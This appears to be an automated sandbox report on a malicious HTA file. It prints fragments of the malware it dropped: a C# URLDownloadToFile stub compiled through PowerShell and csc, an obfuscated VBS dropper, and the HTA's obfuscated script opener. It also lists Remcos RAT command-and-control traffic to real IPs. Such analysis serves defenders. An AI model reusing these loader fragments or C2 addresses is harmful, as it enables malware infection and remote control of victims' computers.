                                                Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.f.r.v.b.p.i.m...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...r.f.r.v.b.p.i.m...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.0.cs

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (357)
                                                Category:dropped
                                                Size (bytes):474
                                                Entropy (8bit):3.7573860321684496
                                                Encrypted:false
                                                SSDEEP:6:V/DsYLDS81zuSOUynPMOfPQXReKJ8SRHy4HNvma84WuO0Vf1Ky:V/DTLDfux1twXfHmq1Ky
                                                MD5:F884800327D4027747DA358D54A2953C
                                                SHA1:B1D1103720A4787BB3CB5832461F367275978422
                                                SHA-256:13DE24EEAFC24C4A53199D015B92DD5DDCD552CEAA74FB14D2BBB26DC6366E9B
                                                SHA-512:CBFD55F5481DA04F30D8590B64CC314751B158CBF775686A11F430B0619D069ADC16C2A387FD1789B49A10AA760B4AB36CB12F96F21C4208ABB89A5F0D52C520
                                                Malicious:false
                                                Preview:.using System;.using System.Runtime.InteropServices;..namespace zgrfzBkDlie.{. public class ko. {. [DllImport("URlMON.Dll", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr xswB,string vCAymqHW,string sDr,uint LR,IntPtr gpyRsuh);.. }..}.

                                                C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.cmdline

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                                Category:dropped
                                                Size (bytes):371
                                                Entropy (8bit):5.192554434438355
                                                Encrypted:false
                                                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fXxX/J0zxs7+AEszI923fXxXVFH:p37Lvkmb6Kzph0WZE2pF9
                                                MD5:FA1654F04E410D6688F4547006B0036A
                                                SHA1:B58227224FE4F02AB43B3B1E5E5E37D94B0BAE0B
                                                SHA-256:89B8285E3C6C29E7F6BFB1E07143CBBF35776C2AC84A03FD4C1E28A62490F62C
                                                SHA-512:F926AF8DB9B92DCF9122274DD68E6A78A04ED219D4F2DCBE982BFCBD5E0F682D7B4F9711B65A9955CD1DB90DE815FF4FD1F0A465FBF47AF206E52725AF1C0388
                                                Malicious:true
                                                Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.0.cs"

                                                C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.dll

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):3072
                                                Entropy (8bit):2.8118452624656625
                                                Encrypted:false
                                                SSDEEP:24:etGSjPBG5eM7p8s8SgkCMqzAZwcL4tkZfJAR2pqhkWI+ycuZhN7GakS6XPNnq:6ksM+DMoywivJOR4EH1ul7Ga36Fq
                                                MD5:2EAB0F1D0B0A9365B7CBFA1E054710B1
                                                SHA1:23A4430444673FFD277D27EA31C0F56DEBF38E9D
                                                SHA-256:E41896F226ECB90A08BF1C7DDD8155E0EE88926916B7DE126971178793631959
                                                SHA-512:56DFF43C61385D7A9F446C09E286CDB6490C721555BA94E2328FE5C55C7FF8C065042D43664AD5D5FFB9FEE8C9E76CD5759B75FB5D33BDD18405B05DCAF921DE
                                                Malicious:false
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....U.f...........!.................#... ...@....... ....................................@.................................X#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................6./.....r.....r.......................................... =.....P ......O.........U.....Z.....c.....g.....j...O.....O...!.O.....O.......!.....*.......=.......................................&..........<Module>.rf

                                                C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.out

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (449), with CRLF, CR line terminators
                                                Category:modified
                                                Size (bytes):870
                                                Entropy (8bit):5.2784419133544445
                                                Encrypted:false
                                                SSDEEP:24:KMoqd3ka6KzhE2H4Kax5DqBVKVrdFAMBJTH:doika6ahE2H4K2DcVKdBJj
                                                MD5:9B2751C9BF59C7226FB629A8A42BB24F
                                                SHA1:97A534393A034D874696A62B659C2AF8F6D0FC05
                                                SHA-256:5CD4794F5154781B983E3E3CF52DE602E20D3448E3B60A67F7E7FF90EF5A60A9
                                                SHA-512:D20C9F47B651A42D7B8A53247E232A3997E7489B00A3EC2814065164D3882D20AEDB37318A159D459901DD172EF48D6998CFB9CDF7F8A9FD87C640212B0DC9A0
                                                Malicious:false
                                                Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                C:\Users\user\AppData\Roaming\nicemeetingsofpictureclearthingstob.Vbs

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):260242
                                                Entropy (8bit):3.765032305777867
                                                Encrypted:false
                                                SSDEEP:3072:LwUs2qx9vFgTOuYTLaGHcntHONrLgt5psGwH7Hkyb9qGjK6Heo7sQ5CoBAlbjZft:MUgvFgTfYiGHs2/2Gj+ULIoSVZ+zO
                                                MD5:10A145CB87654A33C6C0BEDA947466B8
                                                SHA1:A504192F1B5AC44E6E49B4BC9EF660220C604469
                                                SHA-256:80E7C85EEB0A57E9F50E7D84E0EB1B2F2230837B53080D24696FAB7373E9BC03
                                                SHA-512:FBC4F71668B7AF09338AE7060C04DD8FEED091B3B7ADB490647C92D731CEFCA4B1E929D36F750563FF0AFA14B797984625EAF964F25A3F71B597343D79EC891A
                                                Malicious:true
                                                Preview:..........f.G.U.W.L.a.C.k.k.R.k.W.c.W.a.l.K.J.z.c.K.L.t.L.z. .=. .".d.T.b.A.p.U.N.c.K.A.p.S.K.L.f.U.H.z.K.b.f.c.o.U.l.".....L.P.B.n.c.L.i.u.e.G.e.k.q.T.c.a.n.t.i.s.s.o.c.i.a.l.i.s.t.a.L.P.p.O.B.P.h.e. .=. .".K.z.l.A.Q.S.K.q.Z.m.e.L.p.t.a.c.a.e.e.A.W.u.o.o.i.".....W.b.b.u.W.h.z.U.c.L.i.G.z.v.Q.p.P.G.O.o.J.c.U.r.U. .=. .".L.P.Z.K.i.q.A.L.i.Z.t.P.P.U.U.O.i.i.h.p.t.R.c.d.G.".....p.v.K.Z.o.J.o.H.l.m.m.K.g.p.G.H.e.G.H.Z.z.n.K.L.i. .=. .".a.d.l.W.v.L.P.p.j.Z.R.W.e.k.q.U.W.e.Z.a.N.G.t.A.L.".....B.i.U.z.J.L.L.J.W.b.p.C.Z.L.p.i.R.e.H.s.b.N.W.O.Z. .=. .".R.p.a.L.k.G.N.W.Q.k.W.z.L.W.W.g.W.L.p.x.u.d.G.L.c.".....e.G.g.z.N.t.o.i.W.u.W.f.B.k.c.z.c.m.u.q.Z.j.H.i.g. .=. .".Q.i.e.L.L.A.p.L.L.K.W.b.K.f.f.R.L.L.O.Z.z.B.h.W.i.".....P.W.K.c.c.U.m.c.m.Z.j.f.u.d.n.e.c.P.U.W.W.R.v.f.L. .=. .".l.U.O.P.r.G.C.v.i.K.N.e.i.f.i.t.W.A.I.t.K.Z.Z.k.L.".....a.S.i.z.W.P.O.Q.j.e.p.q.h.h.f.l.Z.b.G.O.s.c.p.A.p. .=. .".L.s.P.K.G.P.N.c.T.U.L.G.k.i.k.m.q.f.o.g.L.o.W.L.O.".....L.b.n.m.I.g.L.A.P.z.J.U.h.R.i.Z.v.K.P.e.i.N.i.K.s. .

                                                Static File Info

                                                General

                                                File type:HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
                                                Entropy (8bit):2.55207185032906
                                                TrID:
                                                • HTML Application (8008/1) 100.00%
                                                File name:LJ1IZDkHyE.hta
                                                File size:118'193 bytes
                                                MD5:d6a04e7ba31d063b7176e3f9fc96c46a
                                                SHA1:e8929b14ea18c20d4a81ac3faf681031924c9d14
                                                SHA256:2377328ff0a0b26133c534cb523576567f94d73726102f905e97f813b20a86a2
                                                SHA512:81fc9692f3e031cedbfd0623b69b21017504a8376e14ef3ee002b14517e857e45b07191bb84436e1bfebf1fa8fd6a375dc61716bebb253db2e4c015f740424b0
                                                SSDEEP:96:Ea+M7XjJ7GJyXOVKBhqCJgqC8R7JR2JacLZL+dJAcAT:Ea+QXjJaJpKBgVOJEJwdJArT
                                                TLSH:3CC3B09AEA3648ECBBCD9EA77EFC738D7A28235F6B461E51434B3646CC5170C808055C
                                                File Content Preview:<script>.. ..document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatibl

                                                Network Behavior

                                                Suricata IDS Alerts

                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2024-09-25T18:49:56.463614+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54972345.134.140.7050312TCP
                                                2024-09-25T18:50:19.290790+02002020423ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M11104.168.32.14880192.168.2.549708TCP
                                                2024-09-25T18:50:19.290790+02002020425ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M11104.168.32.14880192.168.2.549708TCP
                                                2024-09-25T18:50:41.546804+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54971145.134.140.7050312TCP
                                                2024-09-25T18:51:03.935894+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54971345.134.140.7050312TCP
                                                2024-09-25T18:51:26.329688+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54971545.134.140.7050312TCP
                                                2024-09-25T18:51:48.885817+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54971645.134.140.7050312TCP
                                                2024-09-25T18:52:11.300191+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54971745.134.140.7050312TCP
                                                2024-09-25T18:52:33.741698+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54971845.134.140.7050312TCP
                                                2024-09-25T18:52:56.235749+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54971945.134.140.7050312TCP
                                                2024-09-25T18:53:18.658908+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54972045.134.140.7050312TCP
                                                2024-09-25T18:53:41.236809+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54972145.134.140.7050312TCP
                                                2024-09-25T18:54:03.773321+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54972245.134.140.7050312TCP

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Sep 25, 2024 18:50:06.111886024 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.116779089 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.116990089 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.117193937 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.122107029 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.613581896 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.613610983 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.613627911 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.613698959 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.613713980 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.613732100 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.613748074 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.613765001 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.613779068 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.613781929 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.613794088 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.613852024 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.613883018 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.618721962 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.618769884 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.618784904 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.618798971 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.618799925 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.618818998 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.618844032 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.703967094 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.703989983 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.704016924 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.704031944 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.704049110 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.704158068 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.704385042 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.704402924 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.704411030 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.704418898 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.704451084 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.704476118 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.704948902 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.705002069 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.705020905 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.705037117 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.705061913 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.705080986 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.705080986 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.705100060 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.705121994 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.705137014 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.705754995 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.705807924 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.705822945 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.705835104 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.705849886 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.705866098 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.705914021 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.705930948 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.705951929 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.705971003 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.706608057 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.706656933 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.706657887 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.706675053 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.706696987 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.706717968 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.706729889 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.706738949 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.706757069 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.706773043 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.709011078 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.709069014 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.794730902 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.794761896 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.794770002 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.794778109 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.794787884 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.794918060 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.794945002 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.794956923 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.794960022 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.794976950 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.794991016 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.795002937 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.795005083 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.795018911 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.795026064 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.795031071 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.795033932 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.795043945 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.795100927 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.795578003 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.795593977 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.795614958 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.795634031 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.795646906 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.795660973 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.795661926 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.795679092 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.795687914 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.795695066 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.795713902 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.795741081 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.795830011 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.795845985 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.795870066 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.795870066 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.795887947 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.795890093 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.795907974 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.795924902 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.796473980 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.796499014 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.796513081 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.796524048 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.796530962 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.796552896 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.796576977 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.796588898 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.796605110 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.796613932 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.796663046 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.796679020 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.796689987 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.796708107 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.796724081 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.796751022 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.796761036 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.796780109 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.796799898 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.796814919 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.796829939 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.796839952 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.796845913 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.796864986 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.796876907 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.796879053 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.796899080 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.796926022 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.797533035 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.797549009 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.797564983 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.797586918 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.797609091 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.797626972 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.797627926 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.797641993 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.797658920 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.797663927 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.797677040 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.797683954 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.797700882 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.797717094 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.885314941 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.885338068 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.885365963 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.885381937 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.885400057 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.885418892 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.885432005 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.885507107 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.885507107 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.885507107 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.885507107 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.885586023 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.885613918 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.885629892 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.885636091 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.885658026 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.885660887 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.885674000 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.885683060 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.885690928 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.885703087 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.885708094 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.885726929 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.885737896 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.885766029 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.885771036 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.885787964 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.885816097 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.885835886 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.885900021 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.885945082 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.885971069 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.885986090 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.886002064 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.886014938 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.886029959 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.886046886 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.886151075 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.886167049 CEST8049704104.168.32.148192.168.2.5
